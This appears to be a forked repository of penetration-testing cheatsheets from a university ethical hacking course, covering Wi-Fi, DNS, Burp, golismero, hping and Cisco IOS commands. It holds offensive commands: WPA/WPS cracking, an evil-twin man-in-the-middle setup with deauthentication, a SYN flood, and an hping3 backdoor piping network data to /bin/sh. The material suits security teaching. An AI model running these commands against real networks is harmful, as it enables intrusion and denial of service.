├── Cisco-iOS ├── README.md ├── aircrack-ng ├── airport ├── burp ├── cewl ├── cidr ├── cookies ├── dig ├── fierce ├── ftp ├── golismero ├── hping ├── http ├── https-ssl-tls ├── hydra ├── john ├── maltego ├── markdown ├── medusa ├── metasploit ├── meterpreter ├── msfvenom ├── mysql ├── ncat ├── nessus ├── netcat ├── nikto ├── nmap ├── nping ├── permissions ├── php ├── pivoting ├── ps ├── python ├── reverse-shell ├── ruby ├── shadow ├── shodan ├── sqlmap ├── tcpdump ├── tshark ├── volatility ├── webservervulns ├── wireless-encryptions ├── wireshark └── wpHardening /Cisco-iOS: -------------------------------------------------------------------------------- 1 | #Cisco iOS - Commands 2 | #Jose Moruno Cadima 3 | 4 | #Enters enable mode 5 | enable 6 | 7 | # Short for, configure terminal 8 | conf t 9 | 10 | #Configure FastEthernet 0/0 11 | (config)# interface fa0/0 12 | 13 | #Add ip to fa0/0 14 | (config-if)# ip addr 0.0.0.0 255.255.255.255 15 | 16 | #Add ip to fa0/0 17 | (config-if)# ip addr 0.0.0.0 255.255.255.255 18 | 19 | #Configure vty line 20 | (config-if)# line vty 0 4 21 | 22 | #Cisco set telnet password 23 | (config-line)# login 24 | 25 | #Set telnet password 26 | (config-line)# password YOUR-PASSWORD 27 | 28 | #Show running config loaded in memory 29 | # show running-config 30 | 31 | #Show sartup config 32 | # show startup-config 33 | 34 | #show cisco IOS version 35 | # show version 36 | 37 | #display open sessions 38 | # show session 39 | 40 | #Show network interfaces 41 | # show ip interface 42 | 43 | #Show detailed interface info 44 | # show interface e0 45 | 46 | #Show routes 47 | # show ip route 48 | 49 | Show access lists 50 | # show access-lists 51 | 52 | #Show available files 53 | # dir file systems 54 | 55 | #File information 56 | # dir all-filesystems 57 | 58 | #Show deleted files 59 | # dir /all 60 | 61 | #No limit on terminal output 62 | # terminal length 0 63 | 64 | #Copys running config to tftp server 65 | # copy running-config tftp 66 | 67 | #Copy startup-config to running-config 68 | # copy running-config startup-config 69 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | NOTE 2 | ==== 3 | 4 | [andrewjkerr](https://github.com/andrewjkerr/security-cheatsheets) forked repository for 5 | [www.sniferl4bs.com](www.sniferl4bs.com) 6 | 7 | The fork was done because the original author has not updated about 2 years ago. 8 | 9 | Security Cheatsheets 10 | ==================== 11 | 12 | These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets are to aid penetration testers/CTF participants/security enthusiasts in remembering commands that are useful, but not frequently used. Most of the tools that will be covered have been included in our class and are available in [Kali Linux](http://www.kali.org). 13 | 14 | Requirements 15 | ------------ 16 | 17 | The only requirement to use these cheatsheets is for [cheat](https://github.com/chrisallenlane/cheat) to be installed. 18 | 19 | How to Use 20 | ---------- 21 | 22 | In order to use these cheatsheets, the cheatsheets in this repository need to go into `~/.cheat/` directory. After the files are moved into that directory, `cheat ncat` will display the ncat cheatsheet. 23 | 24 | Contributors 25 | ============ 26 | 27 | Jose Moruno Cadima aka Snifer [TWITTER](https://twitter.com/sniferl4bs) [BLOG](http://www.sniferl4bs.com) 28 | 29 | Jason Soto aka Jsitech [TWITTER](https://twitter.com/Jsitech) [BLOG](http://www.jsitech.com) 30 | 31 | GUTEM - [GITHUB](https://github.com/Gutem) 32 | 33 | Original Contributors 34 | ===================== 35 | 36 | Andrew Kerr (andrewjkerr) 37 | 38 | Angela Evans (angelaevans) 39 | 40 | Alex Bujduveanu (alexbujduveanu) 41 | 42 | Michael Christakos (truckiewow) 43 | Resources 44 | ========= 45 | 46 | Metasploit Cheat Sheet [Sans Institute](http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf) 47 | 48 | Volatility Cheat Sheet [Sans Institute] (https://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf) 49 | 50 | Cisco IOS Cheat Sheet [highon.coffee](highon.coffee) 51 | -------------------------------------------------------------------------------- /aircrack-ng: -------------------------------------------------------------------------------- 1 | #Wifi Cheat Sheet - aircrack-ng 2 | # michael 3 | #Jose Moruno Cadima 4 | #Uceka CheatSheet 5 | 6 | #Start Monitor Mode and Save captures 7 | iw dev wlan0 add interface mon0 type monitor 8 | airmon-ng start wlan0 9 | airodump-ng -c --bssid -w 10 | 11 | 12 | # To crack WEP for a given essid name and store into a file 13 | aircrack-ng -a 1 -e -l <.cap or .ivs file(s)> 14 | 15 | # To crack WPA/WPA2 from airolib-ng database 16 | aircrack-ng -e -r <.cap or .ivs file(s)> 17 | 18 | # To crack WPA/WPA2 from a wordlist 19 | aircrack-ng -e -w <.cap or .ivs file(s)> 20 | 21 | # To crack a given bssid 22 | aircrack-ng -b -l <.cap or .ivs file(s)> 23 | 24 | # To crack a given bssid using FMS/Korek method 25 | aircrack-ng -K -b <.cap or .ivs file(s)> 26 | 27 | # To crack a given essid (WEP) and display the ASCII of the key 28 | aircrack-ng -e -s <.cap of .ivs file(s)> 29 | 30 | # To crack a given essid (WEP) and create a EWSA Project 31 | aircrack-ng -e -E <.cap or .ivs file(s)> 32 | 33 | #Attack WPS with Reaver 34 | wash –i wlan0mon –C 35 | reaver –i wlan0mon –b -vv –S 36 | #or, Specific attack 37 | reaver –i –c -b -p -vv –S 38 | 39 | 40 | #Find Hidden SSID 41 | airmon-ng start wlan0 42 | airodump-ng –c --bssid wlan0mon 43 | aireplay-ng -0 20 –a -c wlan0mon 44 | 45 | #Man in the Middle Attack 46 | 47 | airmon-ng start wlan0 48 | airbase-ng –e “” wlan0mon 49 | brctl addbr 50 | brctl addif wlan0mon 51 | brctl addif at0 52 | ifconfig eth0 0.0.0.0 up 53 | ifconfig at0 0.0.0.0 up 54 | ifconfig up 55 | aireplay-ng –deauth 0 –a wlan0mon 56 | dhclient3 & 57 | wireshark & select interface 58 | -------------------------------------------------------------------------------- /airport: -------------------------------------------------------------------------------- 1 | # Gutem 2 | # OSX's Airport commands to Scan & Sniff Wireless Networks 3 | 4 | # Create a Alias. Don't forgrt to source your .bashrc after this 5 | echo 'alias airport="/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport"' > .bash_alias 6 | 7 | # Or you can create a symbolic link 8 | sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport 9 | 10 | # Scanning the networks 11 | # INTERFACE is optional if you only have one wireless interface 12 | # You can use '| grep WEP' to show only WEP Networks or '| grep WPS' to show only WPS-enabled Networks 13 | airport (INTERFACE) scan 14 | 15 | # Sniffing at Channel 16 | airport (INTERFACE) sniff CHANNEL 17 | 18 | # File generated 19 | /tmp/airportSniffXXXXXX.cap 20 | 21 | # Checking file's size 22 | du -hs /tmp/*.cap 23 | 24 | # Cracking with Aircrack. 25 | # Attack mode: 1/WEP, 2/WPA-PSK 26 | aircrack-ng -a 1 -b $BSSID $CAP_FILE 27 | -------------------------------------------------------------------------------- /burp: -------------------------------------------------------------------------------- 1 | # Burp Cheat Sheet 2 | # A cheat sheet for PortSwigger Burp Suite application security testing framework. 3 | # Original: https://github.com/mccabe615/BurpCheatSheet 4 | 5 | # Global 6 | 7 | # Send to Repeater 8 | Ctrl+R 9 | 10 | # Send to Intruder 11 | Ctrl+I 12 | 13 | # Forward intercepted Proxy message 14 | Ctrl+F 15 | 16 | # Toggle Proxy interception 17 | Ctrl+T 18 | 19 | # Switch to Target 20 | Ctrl+Shift+T 21 | 22 | # Switch to Proxy 23 | Ctrl+Shift+P 24 | 25 | # Switch to Scanner 26 | Ctrl+Shift+S 27 | 28 | # Switch to Intruder 29 | Ctrl+Shift+I 30 | 31 | # Switch to Repeater 32 | Ctrl+Shift+R 33 | 34 | # Switch to Suite options 35 | Ctrl+Shift+O 36 | 37 | # Switch to Alerts tab 38 | Ctrl+Shift+A 39 | 40 | # Go to previous tab 41 | Ctrl+Minus 42 | 43 | # Go to next tab 44 | Ctrl+Equals 45 | 46 | Editor 47 | 48 | # Cut 49 | Ctrl+X 50 | 51 | # Copy 52 | Ctrl+C 53 | 54 | # Paste 55 | Ctrl+V 56 | 57 | # Undo 58 | Ctrl+Z 59 | 60 | # Redo 61 | Ctrl+Y 62 | 63 | # Select all 64 | Ctrl+A 65 | 66 | # Search 67 | Ctrl+S 68 | 69 | # Go to previous search match 70 | Ctrl+Comma 71 | 72 | # Go to next search match 73 | Ctrl+Period 74 | 75 | # URL-decode 76 | Ctrl+Shift+U 77 | 78 | # URL-encode key characters 79 | Ctrl+U 80 | 81 | # HTML-decode 82 | Ctrl+Shift+H 83 | 84 | # HTML-encode key characters 85 | Ctrl+H 86 | 87 | # Base64-decode 88 | Ctrl+Shift+B 89 | 90 | # Base64-encode 91 | Ctrl+B 92 | 93 | # Backspace word 94 | Ctrl+Backspace 95 | 96 | # Delete word 97 | Ctrl+Delete 98 | 99 | # Delete line 100 | Ctrl+D 101 | 102 | # Go to previous word 103 | Ctrl+Left 104 | 105 | # Go to previous word (extend selection) 106 | Ctrl+Shift+Left 107 | 108 | # Go to next word 109 | Ctrl+Right 110 | 111 | # Go to next word (extend selection) 112 | Ctrl+Shift+Right 113 | 114 | # Go to previous paragraph 115 | Ctrl+Up 116 | 117 | # Go to previous paragraph (extend selection) 118 | Ctrl+Shift+Up 119 | 120 | # Go to next paragraph 121 | Ctrl+Down 122 | 123 | # Go to next paragraph (extend selection) 124 | Ctrl+Shift+Down 125 | 126 | # Go to start of document 127 | Ctrl+Home 128 | 129 | # Go to start of document (extend selection) 130 | Ctrl+Shift+Home 131 | 132 | # Go to end of document 133 | Ctrl+End 134 | 135 | # Go to end of document (extend selection) 136 | Ctrl+Shift+End 137 | -------------------------------------------------------------------------------- /cewl: -------------------------------------------------------------------------------- 1 | # To spider a site and write all found words to a file 2 | cewl -w 3 | 4 | # To spider a site and follow links to other sites 5 | cewl -o 6 | 7 | # To spider a site using a given user-agent 8 | cewl -u 9 | 10 | # To spider a site for a given depth and minimum word length 11 | cewl -d -m 12 | 13 | # To spider a site and include a count for each word 14 | cewl -c 15 | 16 | # To spider a site inluding meta data and separate the meta_data words 17 | cewl -a -meta_file 18 | 19 | # To spider a site and store email adresses in a separate file 20 | cewl -e -email_file 21 | -------------------------------------------------------------------------------- /cidr: -------------------------------------------------------------------------------- 1 | # alex 2 | 3 | # Classless Inter-Domain Routing 4 | 5 | # Before CIDR and Variable Length Subnet Masks, IP addresses had fixed subnet masks 6 | # Class C had a 24 bit prefix (/24), Class B had a 16 bit prefix (/16), and Class A had an 8 bit prefix (/8) 7 | 8 | # Note: The prefix determines how many addresses are covered by the CIDR address. The prefix is the number of bits reserved for the network portion of the address 9 | 10 | # An IP address consists of a host and a network portion 11 | # The 32 bit string below represents a /16 network since 16 bits are dedicated to the network portion of the address 12 | # Network bits / Host bits 13 | 11111111 11111111 / 00000000 00000000 14 | 15 | # As an example, if we were to make a subnet with only 2 addresses on the 3.3.3.0 network, the network prefix would be /31 16 | # If we view this in binary it would look like: 17 | 00000011.00000011.00000011.00000000 (3.3.3.0) 18 | 19 | # The subnet mask then becomes 20 | 11111111.11111111.11111111.11111110 (/31) 21 | 22 | # In the subnet mask above, only one bit is available for modification, so the only two available IP addresses would be: 23 | 3.3.3.0 and 3.3.3.1 24 | 25 | # 3.3.3.2 would represent the start of another subnet 26 | 27 | # If we changed the prefix to /30, the new IP address range would be 28 | 3.3.3.0 - 3.3.3.3 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /cookies: -------------------------------------------------------------------------------- 1 | # andrew 2 | # javascript 3 | document.cookie; # can pair with alert(); 4 | 5 | # edit cookies in chrome 6 | Settings -> Advanced Settings -> Privacy -> Content -> Cookies 7 | or "Edit This Cookie" plugin 8 | 9 | # edit cookies in firefox 10 | Preferences -> Privacy -> Show Cookies 11 | or "Cookies Manager+" addon 12 | 13 | # cookies with ruby 14 | # Use HTTP::Cookie library 15 | # Following examples were taken from the readme.md from above repository 16 | ## Several cookies 17 | jar = HTTP::CookieJar.new 18 | jar.load(filename) if File.exist?(filename) 19 | header["Set-Cookie"].each { |value| jar.parse(value, uri) } 20 | header["Cookie"] = HTTP::Cookie.cookie_value(jar.cookies(uri)) 21 | 22 | ## One cookie 23 | cookie = HTTP::Cookie.new("uid", "u12345", domain: 'example.org', 24 | for_domain: true, 25 | path: '/', 26 | max_age: 7 * 86400) 27 | header['Set-Cookie'] = cookie.set_cookie_value 28 | 29 | # cookies with python 30 | # python has a cookie library! 31 | # Following example taken from the python documentation 32 | import cookielib, urllib2 33 | cj = cookielib.CookieJar() 34 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) 35 | r = opener.open("http://example.com/") 36 | -------------------------------------------------------------------------------- /dig: -------------------------------------------------------------------------------- 1 | #To run dig (domain information groper) dig domain] #To just get the ip address dig [domain] +nocomments +noauthority +noadditional +nostats OR dig [domain] +noall +answer OR dig [domain] +short #To use a specific query type dig -t [query type] [domain] [options] OR dig [domain] [query type] [options] #To view ALL DNS record types use query ANY dig -t ANY [domain] [options] OR dig [domain] ANY [options] #To do a DNS reverse look up dig -x [ip address] +short #To use a specific DNS server dig @[specific DNS] [domain] #To do a bulk DNS query (where file.txt has all the domains, one to a line) dig [domain1] [options] [domain2] [options] OR dig -f file.txt [options] -------------------------------------------------------------------------------- /fierce: -------------------------------------------------------------------------------- 1 | # To scan a domain and output to a file 2 | fierce -dns -file 3 | 4 | # To scan a domain and specify which dnsserver to use 5 | fierce -dns -dnsserver 6 | 7 | # To scan an internal ip range for a given server 8 | fierce -range -dnsserver 9 | 10 | # To scan a domain using a given wordlist 11 | fierce -dns -wordlist 12 | 13 | # To scan a domain using a specified timeout and number of ip addresses to branch from all found addresses 14 | fierce -dns -tcptimeout <# seconds> -traverse <# addresses> 15 | 16 | # To scan domains from a list and search the entire class C for each found 17 | fierce -dnsfile -wide 18 | -------------------------------------------------------------------------------- /ftp: -------------------------------------------------------------------------------- 1 | #ftp client commands 2 | binary - set binary transfer type 3 | cd - change remote working directory 4 | lcd - change local working directory 5 | get - recieve file 6 | mget - get multiple files 7 | passive - enter passive transfer mode 8 | ls - list contents of remote directory 9 | 10 | #Traditional ports, though they can be dynmically assigned 11 | Port 21 - control commands 12 | Port 20 - data transfer 13 | 14 | #Active mode 15 | Client initiates control session on port 21 and leaves port 20 open for the server to send data, and the server initiates the connection for port 20. 16 | ***If client is behind a firewall, or NAT, then the sever might not be able to connect to send data. 17 | 18 | #Passive mode 19 | Server gives teh client a port to initiate a connection to for data transfer. 20 | ***Most commonly used by browsers, ect. 21 | -------------------------------------------------------------------------------- /golismero: -------------------------------------------------------------------------------- 1 | #Golismero Cheat Sheet 2 | #Jason Soto 3 | 4 | #GoLismero is an open source framework for security testing. It's currently geared towards web security 5 | 6 | #Syntax 7 | 8 | golismero.py [-h] [--help] [-f FILE] [--config FILE] [--user-config FILE] [-p NAME] [--ui-mode MODE] [-v] [-q] [--color] 9 | [--no-color] [--audit-name NAME] [-db DATABASE] [-nd] [-i FILENAME] [-ni] [-o FILENAME] [-no] [--full] [--brief] 10 | [--allow-subdomains] [--forbid-subdomains] [--parent] [-np] [-r DEPTH] [--follow-redirects] [--no-follow-redirects] 11 | [--follow-first] [--no-follow-first] [--max-connections MAX_CONNECTIONS] [-l MAX_LINKS] [-pu USER] [-pp PASS] 12 | [-pa ADDRESS] [-pn PORT] [--cookie COOKIE] [--user-agent USER_AGENT] [--cookie-file FILE] [--persistent-cache] 13 | [--volatile-cache] [-a PLUGIN:KEY=VALUE] [-e PLUGIN] [-d PLUGIN] [--max-concurrent N] [--plugin-timeout N] 14 | [--plugins-folder PATH] 15 | COMMAND [TARGET [TARGET ...]] 16 | 17 | #available commands 18 | 19 | SCAN: 20 | Perform a vulnerability scan on the given targets. Optionally import 21 | results from other tools and write a report. The arguments that follow may 22 | be domain names, IP addresses or web pages. 23 | 24 | RESCAN: 25 | Same as SCAN, but previously run tests are repeated. If the database is 26 | new, this command is identical to SCAN. 27 | 28 | PROFILES: 29 | Show a list of available config profiles. This command takes no arguments. 30 | 31 | PLUGINS: 32 | Show a list of available plugins. This command takes no arguments. 33 | 34 | INFO: 35 | Show detailed information on a given plugin. The arguments that follow are 36 | the plugin IDs. You can use glob-style wildcards. 37 | 38 | REPORT: 39 | Write a report from an earlier scan. This command takes no arguments. 40 | To specify output files use the -o switch. 41 | 42 | IMPORT: 43 | Import results from other tools and optionally write a report, but don't 44 | scan the targets. This command takes no arguments. To specify input files 45 | use the -i switch. 46 | 47 | DUMP: 48 | Dump the database from an earlier scan in SQL format. This command takes no 49 | arguments. To specify output files use the -o switch. 50 | 51 | LOAD: 52 | Load a database dump from an earlier scan in SQL format. This command takes 53 | no arguments. To specify input files use the -i switch. 54 | 55 | UPDATE: 56 | Update GoLismero to the latest version. Requires Git to be installed and 57 | available in the PATH. This command takes no arguments. 58 | 59 | #positional arguments 60 | COMMAND action to perform 61 | TARGET zero or more arguments, meaning depends on command 62 | 63 | #optional arguments 64 | -h show this help message and exit 65 | --help show this help message and exit 66 | 67 | #main options 68 | -f FILE, --file FILE load a list of targets from a plain text file 69 | --config FILE global configuration file 70 | --user-config FILE per-user configuration file 71 | -p NAME, --profile NAME 72 | profile to use 73 | --ui-mode MODE UI mode 74 | -v, --verbose increase output verbosity 75 | -q, --quiet suppress text output 76 | --color use colors in console output 77 | --no-color suppress colors in console output 78 | 79 | #audit options 80 | --audit-name NAME customize the audit name 81 | -db DATABASE, --audit-db DATABASE 82 | specify a database filename 83 | -nd, --no-db do not store the results in a database 84 | -i FILENAME, --input FILENAME 85 | read results from external tools right before the audit 86 | -ni, --no-input do not read results from external tools 87 | 88 | #report options 89 | -o FILENAME, --output FILENAME 90 | write the results of the audit to this file (use - for stdout) 91 | -no, --no-output do not output the results 92 | --full produce fully detailed reports 93 | --brief report only the highlights 94 | 95 | #network options 96 | --allow-subdomains include subdomains in the target scope 97 | --forbid-subdomains do not include subdomains in the target scope 98 | --parent include parent folders in the target scope 99 | -np, --no-parent do not include parent folders in the target scope 100 | -r DEPTH, --depth DEPTH 101 | maximum spidering depth (use "infinite" for no limit) 102 | --follow-redirects follow redirects 103 | --no-follow-redirects 104 | do not follow redirects 105 | --follow-first always follow a redirection on the target URL itself 106 | --no-follow-first don't treat a redirection on a target URL as a special case 107 | --max-connections MAX_CONNECTIONS 108 | maximum number of concurrent connections per host 109 | -l MAX_LINKS, --max-links MAX_LINKS 110 | maximum number of links to analyze (0 => infinite) 111 | -pu USER, --proxy-user USER 112 | HTTP proxy username 113 | -pp PASS, --proxy-pass PASS 114 | HTTP proxy password 115 | -pa ADDRESS, --proxy-addr ADDRESS 116 | HTTP proxy address 117 | -pn PORT, --proxy-port PORT 118 | HTTP proxy port number 119 | --cookie COOKIE set cookie for requests 120 | --user-agent USER_AGENT 121 | set a custom user agent or 'random' value 122 | --cookie-file FILE load a cookie from file 123 | --persistent-cache use a persistent network cache [default] 124 | --volatile-cache use a volatile network cache 125 | 126 | #plugin options: 127 | -a PLUGIN:KEY=VALUE, --plugin-arg PLUGIN:KEY=VALUE 128 | pass an argument to a plugin 129 | -e PLUGIN, --enable-plugin PLUGIN 130 | enable a plugin 131 | -d PLUGIN, --disable-plugin PLUGIN 132 | disable a plugin 133 | --max-concurrent N maximum number of plugins to run concurrently 134 | --plugin-timeout N timeout in seconds for the execution of a plugin 135 | --plugins-folder PATH 136 | cheacustomize the location of the plugins 137 | #Example 138 | #Show Available Plugins 139 | $ ./golismero.py plugins 140 | 141 | 142 | #Available Plugins 143 | #Import plugins 144 | 145 | csv_nikto: 146 | Import the results of a Nikto scan in CSV format. 147 | 148 | csv_spiderfoot: 149 | Import the results of a SpiderFoot scan in CSV format. 150 | 151 | xml_nmap: 152 | Import the results of an Nmap scan in XML format. 153 | 154 | xml_openvas: 155 | Import the results of an OpenVAS scan in XML format. 156 | 157 | xml_sslscan: 158 | Import the results of an SSLScan run in XML format. 159 | 160 | #Recon plugins 161 | 162 | dns: 163 | DNS resolver plugin. 164 | Without it, GoLismero can't resolve domain names to IP addresses. 165 | 166 | dns_malware: 167 | Detect if a domain has been potentially spoofed, hijacked. 168 | 169 | exploitdb: 170 | Integration with Exploit-DB (http://www.exploit-db.com/) 171 | This plugin requires a working Internet connection to run. 172 | 173 | fingerprint_web: 174 | Fingerprinter of web servers. 175 | 176 | geoip: 177 | Geolocates IP addresses using online services. 178 | This plugin requires a working Internet connection to run. 179 | 180 | punkspider: 181 | Integration with PunkSPIDER (http://punkspider.hyperiongray.com/) 182 | This plugin requires a working Internet connection to run. 183 | 184 | robots: 185 | Analyzes robots.txt files and extracts their links. 186 | 187 | shodan: 188 | Integration with Shodan: http://www.shodanhq.com/ 189 | This plugin requires a working Internet connection to run. 190 | 191 | spider: 192 | Web spider plugin. 193 | Without it, GoLismero can't crawl web sites. 194 | 195 | spiderfoot: 196 | Integration with SpiderFoot: http://www.spiderfoot.net/ 197 | 198 | theharvester: 199 | Integration with theHarvester: https://github.com/MarioVilas/theHarvester/ 200 | 201 | #Scan plugins 202 | 203 | brute_directories: 204 | Tries to discover hidden folders by brute force: 205 | www.site.com/folder/ -> www.site.com/folder2 www.site.com/folder3 ... 206 | 207 | brute_dns: 208 | Tries to find hidden subdomains by brute force. 209 | 210 | brute_url_extensions: 211 | Tries to discover hidden files by brute force: 212 | www.site.com/index.php -> www.site.com/index.php.old 213 | 214 | brute_url_permutations: 215 | Tries to discover hidden files by bruteforcing the extension: 216 | www.site.com/index.php -> www.site.com/index.php2 217 | 218 | brute_url_predictables: 219 | Tries to discover hidden files at predictable locations. 220 | For example: (Apache) www.site.com/error_log 221 | 222 | brute_url_prefixes: 223 | Tries to discover hidden files by bruteforcing prefixes: 224 | www.site.com/index.php -> www.site.com/~index.php 225 | 226 | brute_url_suffixes: 227 | Tries to discover hidden files by bruteforcing suffixes: 228 | www.site.com/index.php -> www.site.com/index2.php 229 | 230 | nikto: 231 | Integration with Nikto: https://www.cirt.net/nikto2 232 | 233 | nmap: 234 | Integration with Nmap: http://nmap.org/ 235 | 236 | openvas: 237 | Integration with OpenVAS: http://www.openvas.org/ 238 | 239 | plecost: 240 | WordPress vulnerabilities analyzer, completely rewritten for GoLismero, 241 | based on the original idea of Plecost (https://code.google.com/p/plecost/) 242 | and their team: @ffranz and @ggdaniel 243 | 244 | sslscan: 245 | Integration with SSLScan: http://sourceforge.net/projects/sslscan/ 246 | 247 | zone_transfer: 248 | Detects and exploits DNS zone transfer vulnerabilities. 249 | 250 | #Attack plugins 251 | 252 | heartbleed: 253 | Test for the CVE-2014-0160 vulnerability (aka "heartbleed attack"). 254 | 255 | sqlmap: 256 | SQL Injection plugin, using SQLMap. 257 | Only retrieves the DB banner, does not exploit any vulnerabilities. 258 | 259 | xsser: 260 | Integration with XSSer: http://xsser.sourceforge.net/ 261 | 262 | #Report plugins 263 | 264 | bson: 265 | BSON (Binary JSON) output for programmatic access. 266 | 267 | csv: 268 | Writes reports in Comma Separated Values format. 269 | 270 | html: 271 | Writes reports as offline web pages. 272 | 273 | json: 274 | JSON output for programmatic access. 275 | 276 | latex: 277 | Writes reports in LaTeX document format (.tex). 278 | 279 | log: 280 | Extracts only the logs. 281 | 282 | ltsv: 283 | Extracts only the logs, in labeled tab-separated values format. 284 | 285 | msgpack: 286 | MessagePack output for programmatic access. 287 | See: http://msgpack.org/ 288 | 289 | odt: 290 | Writes reports in OpenOffice document format (.odt). 291 | 292 | rst: 293 | Writes reports in reStructured Text format. 294 | 295 | text: 296 | Writes plain text reports to a file or on screen. 297 | 298 | xml: 299 | XML output for programmatic access. 300 | 301 | yaml: 302 | YAML output for programmatic access. 303 | 304 | #UI plugins 305 | 306 | console: 307 | Console user interface. This is the default. 308 | 309 | disabled: 310 | Empty user interface. Used by some unit tests. 311 | 312 | #Examples 313 | #scan a website and show the results on screen: 314 | $./golismero.py scan http://www.example.com 315 | 316 | #grab Nmap results, scan all hosts found and write an HTML report: 317 | $./golismero.py scan -i nmap_output.xml -o report.html 318 | 319 | #grab results from OpenVAS and show them on screen, but don't scan anything: 320 | $./golismero.py import -i openvas_output.xml 321 | 322 | #show information on plugins: 323 | $./golismero.py info [plugin_name] 324 | $./golismero.py info theharvester 325 | $./golismero.py info plecost 326 | $./golismero.py info brute* 327 | 328 | #Scan using specific plugins 329 | $./golismero.py scan [domain] -e 330 | $./golismero.py scan example.com -e plecost 331 | $./golismero.py scan example.com -e plecost -e theharvester 332 | 333 | #Scan using multiple plugins with wildcard 334 | $./golismero scan example.com -e brute* 335 | 336 | #Scanning and generating a HTML report 337 | $././golismero.py scan example.com -o example.html 338 | 339 | #dump the database from a previous scan: 340 | $./golismero.py dump -db example.db -o dump.sql 341 | 342 | #Add Shodan API Key to Golismero 343 | $mkdir ~/.golismero 344 | $nano ~/.golismero/user.conf 345 | [shodan:Configuration] 346 | apikey = 347 | 348 | 349 | 350 | -------------------------------------------------------------------------------- /hping: -------------------------------------------------------------------------------- 1 | # Jose Moruno Cadima <@sniferl4bs> 2 | #Fuente: José A. Guasch SecurityByDefault 3 | 4 | #BASE OPTIONS 5 | -q --quiet -v --version 6 | -I --interface -V --verbose 7 | -D --debug 8 | -c --count count response packets 9 | -i --interval secs or µsecs with u [1] 10 | --beep beep every received packet (no icmp) 11 | -n --numeric don’t resolv 12 | -z --bind use ctrl+z to increment TTL 13 | -Z --unbind 14 | --fase 10 packets / sec 15 | --master 1 packet / µs 16 | --flood as fast as posible 17 | 18 | 19 | #COMMON OPTIONS 20 | -d --data datasize packet body size 21 | -E --file insert into packet’s data 22 | -e --sign signature lenght 23 | -j --dump received packets in hex 24 | -J --print dump in printable char 25 | -B --safe lost pckts will be resend 26 | -u --end send EOF when --file 27 | -T --traceroute traceroute mode, also: 28 | --tr-keep-ttl keep TTL fixed 29 | --tr-stop exit on first not time icmp exceed 30 | --tr-no-rtt dont show RTT 31 | --tcpexitcode set exit code to tcpth_flag of last packet 32 | 33 | #IP RELATED OPTIONS 34 | -a --spoof hostname 35 | --rand-source 36 | --rand-dest host accepts X as wildcard 37 | -t --ttl set ttl value 38 | -N --id ip id [random] 39 | -H --ipprot ip protocol in raw ip mode 40 | -W--winid display id replies from win 41 | -r --rel id increments 42 | -f --frag split packets, [16bytes] 43 | -x --morefrag send ICMP time-exceeded 44 | -y --dontfrag perform PDMTU 45 | -g --fragoff fragment offset value 46 | -G --rroute includes RECORD_ROUTE 47 | -m --mtu value 48 | -o --tos set type of service, on hex 49 | 50 | #ICMP RELATED OPTIONS 51 | -C --icmptype default [echo] 52 | -K --icmpcode ICMP code [0] 53 | --icmp-ipver ip version [4] 54 | --icmp-iphlen ip header length [5] 55 | --icmp-iplen ip packet lenght [real len] 56 | --icmp-ipid set ip id [rand] 57 | --icmp-ipproto set ip protocol [tcp] 58 | --icmp-cksum set checksum [valid] 59 | --icmp-ts timestamp req 60 | --icmp-addr mask req 61 | 62 | TCP/UDP RELATED OPTIONS 63 | -s --baseport [random],+1 on received 64 | -p --destport [0] if have, have: 65 | +port increased for each reply 66 | ++port increased for each sent 67 | --keep still source port 68 | -w --win set win size [64] 69 | -O --tcpoff -b --badchksum 70 | -M--setseq -L --setack 71 | -Q --seqnum collect seq numbers 72 | --tcp-timestamp set timestamp 73 | TCP FLAGS 74 | -F --fin -S --syn -R --rst 75 | -P --push -A --ack -U --urg 76 | -X --xmas -Y --ymas 77 | 78 | PROTOCOL SELECTION 79 | -0 --rawip -1 --icmp -2 --ucp 80 | -8 --scan with: 81 | group ex: 20-53 82 | comma delimited ex: 1,3,4 83 | known: for /etc/services 84 | negated with !ex: 1-53,!4 85 | -9 --listen string match 86 | 87 | Uptime: hping2 -p 80 -S --tcp-timestamp host 88 | PortScan: hping –I eth0 --scan 20-25,80,443 -S host 89 | Synflood: hping –p 80 –i u10000 –a source –S host 90 | S  hping3 -I eth1 -9 secret | /bin/sh Backdoor: C  hping3 -R ip -e secret -E command_file -d 100 -c 1 91 | 92 | ICMP CODES 93 | 0 Echo Reply 94 | 1 Unassigned 95 | 2 Unassigned 96 | 3 Destination Unreachable 97 | 4 Source Quench 98 | 5 Redirect 99 | 6 Alternate Host Address 100 | 7 Unassigned 101 | 8 Echo 102 | 9 Router Advertisement 103 | 10 Router Selection 104 | 11 Time Exceeded 105 | 12 Parameter Problem 106 | 13 Timestamp 107 | 14 Timestamp Reply 108 | 15 Information Request 109 | 16 Information Reply 110 | 17 Address Mask Request 111 | 18 Address Mask Reply 112 | 19 Reserved (for security) 113 | 20-29 Reserved (Experimental) 114 | 30 Traceroute 115 | 31 Datagram Conversion Error 116 | 32 Mobile Host Redirect 117 | 33 IPv6 Where-Are-You 118 | 34 IPv6 I-Am-Here 119 | 35 Mobile Registration Request 120 | 36 Mobile Registration Reply 121 | 37 Domain Name Request 122 | 38 Domain Name Reply 123 | 39 SKIP 124 | 40 Photuris 125 | 41-255 Reserved 126 | 127 | -------------------------------------------------------------------------------- /http: -------------------------------------------------------------------------------- 1 | #HTTP Authentication Types 2 | Digest Authentication (uses htdigest) 3 | -->susceptible to MITM attack! 4 | Integrated Windows Authentication 5 | -->will not function over proxy 6 | Form-Based Authentication 7 | -->not inherently encrypted, often poor implimentation 8 | 9 | [------------------------- HTTP Response Codes ---------------------------] 10 | #Informational Response Codes (1xx) 11 | 100 - Continue 12 | 101 - Switching Protocols 13 | 102 - Processing 14 | 15 | #Success Response Codes (2xx) 16 | 200 - OK 206 - Partial Content 17 | 201 - Created 207 - Multi-status 18 | 202 - Accepted 208 - Already Reported 19 | 203 - Non-authoritative Info 226 - IM Used 20 | 204 - No Content 250 - Low Storage Space 21 | 205 - Reset Content 22 | 23 | #Redirection Response Codes (3xx) 24 | 300 - Multiple Choices 304 - Not 